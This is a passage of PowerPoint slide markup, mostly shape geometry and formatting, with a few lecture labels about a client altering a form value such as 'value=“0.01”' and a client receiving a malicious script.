              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>change the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>value!</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{563008D3-1174-574C-9B29-3171024DD484}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149975" y="4495800"/>
            <a:ext cx="1670050" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" b="1" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>value=“0.01”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29708" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CAAA7CC-A08E-D44B-BE8A-C6A3CDD5FE66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1536700" y="4484688"/>
            <a:ext cx="6588125" cy="298450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 6588759"/>
              <a:gd name="T1" fmla="*/ 150988 h 298450"/>
              <a:gd name="T2" fmla="*/ 0 w 6588759"/>
              <a:gd name="T3" fmla="*/ 147339 h 298450"/>
              <a:gd name="T4" fmla="*/ 7488 w 6588759"/>
              <a:gd name="T5" fmla="*/ 100768 h 298450"/>
              <a:gd name="T6" fmla="*/ 28359 w 6588759"/>
              <a:gd name="T7" fmla="*/ 60322 h 298450"/>
              <a:gd name="T8" fmla="*/ 60184 w 6588759"/>
              <a:gd name="T9" fmla="*/ 28428 h 298450"/>
              <a:gd name="T10" fmla="*/ 100538 w 6588759"/>
              <a:gd name="T11" fmla="*/ 7511 h 298450"/>
              <a:gd name="T12" fmla="*/ 147017 w 6588759"/>
              <a:gd name="T13" fmla="*/ 0 h 298450"/>
              <a:gd name="T14" fmla="*/ 6426970 w 6588759"/>
              <a:gd name="T15" fmla="*/ 0 h 298450"/>
              <a:gd name="T16" fmla="*/ 6473443 w 6588759"/>
              <a:gd name="T17" fmla="*/ 7511 h 298450"/>
              <a:gd name="T18" fmla="*/ 6513799 w 6588759"/>
              <a:gd name="T19" fmla="*/ 28428 h 298450"/>
              <a:gd name="T20" fmla="*/ 6545623 w 6588759"/>
              <a:gd name="T21" fmla="*/ 60322 h 298450"/>
              <a:gd name="T22" fmla="*/ 6566492 w 6588759"/>
              <a:gd name="T23" fmla="*/ 100768 h 298450"/>
              <a:gd name="T24" fmla="*/ 6573985 w 6588759"/>
              <a:gd name="T25" fmla="*/ 147339 h 298450"/>
              <a:gd name="T26" fmla="*/ 6573985 w 6588759"/>
              <a:gd name="T27" fmla="*/ 150988 h 298450"/>
              <a:gd name="T28" fmla="*/ 6566492 w 6588759"/>
              <a:gd name="T29" fmla="*/ 197559 h 298450"/>
              <a:gd name="T30" fmla="*/ 6545623 w 6588759"/>
              <a:gd name="T31" fmla="*/ 238005 h 298450"/>
              <a:gd name="T32" fmla="*/ 6513799 w 6588759"/>
              <a:gd name="T33" fmla="*/ 269900 h 298450"/>
              <a:gd name="T34" fmla="*/ 6473443 w 6588759"/>
              <a:gd name="T35" fmla="*/ 290817 h 298450"/>
              <a:gd name="T36" fmla="*/ 6426970 w 6588759"/>
              <a:gd name="T37" fmla="*/ 298328 h 298450"/>
              <a:gd name="T38" fmla="*/ 147017 w 6588759"/>
              <a:gd name="T39" fmla="*/ 298328 h 298450"/>
              <a:gd name="T40" fmla="*/ 100538 w 6588759"/>
              <a:gd name="T41" fmla="*/ 290817 h 298450"/>
              <a:gd name="T42" fmla="*/ 60184 w 6588759"/>
              <a:gd name="T43" fmla="*/ 269900 h 298450"/>
              <a:gd name="T44" fmla="*/ 28359 w 6588759"/>
              <a:gd name="T45" fmla="*/ 238005 h 298450"/>
              <a:gd name="T46" fmla="*/ 7488 w 6588759"/>
              <a:gd name="T47" fmla="*/ 197559 h 298450"/>
              <a:gd name="T48" fmla="*/ 0 w 6588759"/>
              <a:gd name="T49" fmla="*/ 150988 h 2984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588759" h="298450">
                <a:moveTo>
                  <a:pt x="0" y="150988"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="147339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7511" y="100768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28428" y="60322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60322" y="28428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100768" y="7511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147339" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6441212" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6487786" y="7511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6528232" y="28428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6560126" y="60322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6581041" y="100768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6588552" y="147339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6588552" y="150988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6581041" y="197559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6560126" y="238005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6528232" y="269900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6487786" y="290817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6441212" y="298328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147339" y="298328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100768" y="290817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60322" y="269900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28428" y="238005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7511" y="197559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="150988"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="39290">
            <a:solidFill>
              <a:srgbClr val="B36AE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AB413F6-19FD-D04C-B3A9-BB7439CC06A7}"/>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59747" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{889FB731-39A0-1E45-ADD4-C2F8882ED23B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1287463" y="3395663"/>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48" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D799C5F-1836-FD4A-B99E-DEAA60366AAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="3405188"/>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49" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE29BCCE-6CC0-3442-B019-57C93428FA15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="3405188"/>
            <a:ext cx="1408113" cy="1517650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1821814"/>
              <a:gd name="T1" fmla="*/ 0 h 1905000"/>
              <a:gd name="T2" fmla="*/ 8150 w 1821814"/>
              <a:gd name="T3" fmla="*/ 0 h 1905000"/>
              <a:gd name="T4" fmla="*/ 8150 w 1821814"/>
              <a:gd name="T5" fmla="*/ 16095 h 1905000"/>
              <a:gd name="T6" fmla="*/ 0 w 1821814"/>
              <a:gd name="T7" fmla="*/ 16095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18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1821218"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9C587E71-2F3D-3E4C-880E-264DFA056F1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="4017963"/>
            <a:ext cx="1009650" cy="292100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">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latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C1548C0-B1B7-B84B-B7F1-B915DB4E8C19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562100" y="2874963"/>
            <a:ext cx="923925" cy="430212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-4" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159752" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0627C837-42AB-994F-AA4E-8A43C75480B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="4981575"/>
            <a:ext cx="1760537" cy="15986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53" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CC35B4E-0485-2D43-B095-A7860251F32D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="15192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54" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF1F99DC-712B-694D-9D13-EE909B96B8E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="1519237"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2176145"/>
              <a:gd name="T1" fmla="*/ 0 h 1905000"/>
              <a:gd name="T2" fmla="*/ 9833 w 2176145"/>
              <a:gd name="T3" fmla="*/ 0 h 1905000"/>
              <a:gd name="T4" fmla="*/ 9833 w 2176145"/>
              <a:gd name="T5" fmla="*/ 16453 h 1905000"/>
              <a:gd name="T6" fmla="*/ 0 w 2176145"/>
              <a:gd name="T7" fmla="*/ 16453 h 1905000"/>
              <a:gd name="T8" fmla="*/ 0 w 2176145"/>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6145" h="1905000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2176145" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217614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9755" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBAED94C-22F2-D94E-82A1-7539C3039130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="1530350"/>
            <a:ext cx="1741487" cy="15795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56" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44BE379C-F258-1A43-B2C6-DE0E2EC3DFF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="1541463"/>
            <a:ext cx="1682750" cy="1517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3" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABD75478-5FF1-8248-8DCE-6C56DF088538}"/>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59758" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95DBA084-673A-6344-8AE8-10CD4751A071}"/>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9759" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84DFBAB5-2117-9046-9AD5-D692D18EBD80}"/>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9760" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB345BD2-5A13-DE41-B8C5-28F2D95D502B}"/>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9761" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{539B5AB9-6FBE-E147-94B3-373B1E98742F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6399213" y="5156200"/>
            <a:ext cx="263525" cy="227013"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 534 w 339725"/>
              <a:gd name="T1" fmla="*/ 0 h 284479"/>
              <a:gd name="T2" fmla="*/ 0 w 339725"/>
              <a:gd name="T3" fmla="*/ 2486 h 284479"/>
              <a:gd name="T4" fmla="*/ 1638 w 339725"/>
              <a:gd name="T5" fmla="*/ 2210 h 284479"/>
              <a:gd name="T6" fmla="*/ 534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110566" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="284048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339318" y="252590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1105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59762" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD6104E7-A9E0-F845-BE11-2560679080F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2700338" y="4316413"/>
            <a:ext cx="261937" cy="227012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1443 w 339725"/>
              <a:gd name="T1" fmla="*/ 0 h 284479"/>
              <a:gd name="T2" fmla="*/ 0 w 339725"/>
              <a:gd name="T3" fmla="*/ 271 h 284479"/>
              <a:gd name="T4" fmla="*/ 971 w 339725"/>
              <a:gd name="T5" fmla="*/ 2484 h 284479"/>
              <a:gd name="T6" fmla="*/ 1443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339369" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="30962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228396" y="283883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3393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 name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{912772DA-6FBC-484C-ABE3-E4E7A101F10E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1260000">
            <a:off x="3359150" y="5057775"/>
            <a:ext cx="3617913" cy="282575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2174"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3400" baseline="1915" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2300" spc="12" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2300" spc="-82" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" spc="59" baseline="-1915" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:endParaRPr sz="3400" baseline="-1915" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159764" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A749BD73-22A2-D94E-A631-2BAE0EF61929}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3154363" y="4156075"/>
            <a:ext cx="365125" cy="376238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2135 w 471170"/>
              <a:gd name="T1" fmla="*/ 1262 h 471170"/>
              <a:gd name="T2" fmla="*/ 2202 w 471170"/>
              <a:gd name="T3" fmla="*/ 1666 h 471170"/>
              <a:gd name="T4" fmla="*/ 2226 w 471170"/>
              <a:gd name="T5" fmla="*/ 2074 h 471170"/>
              <a:gd name="T6" fmla="*/ 2207 w 471170"/>
              <a:gd name="T7" fmla="*/ 2475 h 471170"/>
              <a:gd name="T8" fmla="*/ 2147 w 471170"/>
              <a:gd name="T9" fmla="*/ 2860 h 471170"/>
              <a:gd name="T10" fmla="*/ 2050 w 471170"/>
              <a:gd name="T11" fmla="*/ 3217 h 471170"/>
              <a:gd name="T12" fmla="*/ 1917 w 471170"/>
              <a:gd name="T13" fmla="*/ 3534 h 471170"/>
              <a:gd name="T14" fmla="*/ 1751 w 471170"/>
              <a:gd name="T15" fmla="*/ 3801 h 471170"/>
              <a:gd name="T16" fmla="*/ 1554 w 471170"/>
              <a:gd name="T17" fmla="*/ 4007 h 471170"/>
              <a:gd name="T18" fmla="*/ 1338 w 471170"/>
              <a:gd name="T19" fmla="*/ 4134 h 471170"/>
              <a:gd name="T20" fmla="*/ 1121 w 471170"/>
              <a:gd name="T21" fmla="*/ 4178 h 471170"/>
              <a:gd name="T22" fmla="*/ 907 w 471170"/>
              <a:gd name="T23" fmla="*/ 4141 h 471170"/>
              <a:gd name="T24" fmla="*/ 702 w 471170"/>
              <a:gd name="T25" fmla="*/ 4029 h 471170"/>
              <a:gd name="T26" fmla="*/ 511 w 471170"/>
              <a:gd name="T27" fmla="*/ 3846 h 471170"/>
              <a:gd name="T28" fmla="*/ 343 w 471170"/>
              <a:gd name="T29" fmla="*/ 3597 h 471170"/>
              <a:gd name="T30" fmla="*/ 201 w 471170"/>
              <a:gd name="T31" fmla="*/ 3285 h 471170"/>
              <a:gd name="T32" fmla="*/ 91 w 471170"/>
              <a:gd name="T33" fmla="*/ 2915 h 471170"/>
              <a:gd name="T34" fmla="*/ 23 w 471170"/>
              <a:gd name="T35" fmla="*/ 2512 h 471170"/>
              <a:gd name="T36" fmla="*/ 0 w 471170"/>
              <a:gd name="T37" fmla="*/ 2103 h 471170"/>
              <a:gd name="T38" fmla="*/ 19 w 471170"/>
              <a:gd name="T39" fmla="*/ 1702 h 471170"/>
              <a:gd name="T40" fmla="*/ 79 w 471170"/>
              <a:gd name="T41" fmla="*/ 1318 h 471170"/>
              <a:gd name="T42" fmla="*/ 177 w 471170"/>
              <a:gd name="T43" fmla="*/ 961 h 471170"/>
              <a:gd name="T44" fmla="*/ 309 w 471170"/>
              <a:gd name="T45" fmla="*/ 644 h 471170"/>
              <a:gd name="T46" fmla="*/ 475 w 471170"/>
              <a:gd name="T47" fmla="*/ 376 h 471170"/>
              <a:gd name="T48" fmla="*/ 672 w 471170"/>
              <a:gd name="T49" fmla="*/ 171 h 471170"/>
              <a:gd name="T50" fmla="*/ 887 w 471170"/>
              <a:gd name="T51" fmla="*/ 43 h 471170"/>
              <a:gd name="T52" fmla="*/ 1105 w 471170"/>
              <a:gd name="T53" fmla="*/ 0 h 471170"/>
              <a:gd name="T54" fmla="*/ 1319 w 471170"/>
              <a:gd name="T55" fmla="*/ 37 h 471170"/>
              <a:gd name="T56" fmla="*/ 1524 w 471170"/>
              <a:gd name="T57" fmla="*/ 148 h 471170"/>
              <a:gd name="T58" fmla="*/ 1714 w 471170"/>
              <a:gd name="T59" fmla="*/ 331 h 471170"/>
              <a:gd name="T60" fmla="*/ 1882 w 471170"/>
              <a:gd name="T61" fmla="*/ 581 h 471170"/>
              <a:gd name="T62" fmla="*/ 2025 w 471170"/>
              <a:gd name="T63" fmla="*/ 893 h 471170"/>
              <a:gd name="T64" fmla="*/ 2135 w 471170"/>
              <a:gd name="T65" fmla="*/ 1262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51630" y="142261"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="466021" y="187720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="470920" y="233728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466820" y="279041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="454217" y="322414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="433605" y="362603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405478" y="398365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370331" y="428456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328659" y="451630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283199" y="466021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237191" y="470920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191879" y="466820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148505" y="454217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108316" y="433605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72554" y="405478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42464" y="370331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19289" y="328659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4898" y="283199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="237191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4099" y="191879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16702" y="148506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37315" y="108316"/>
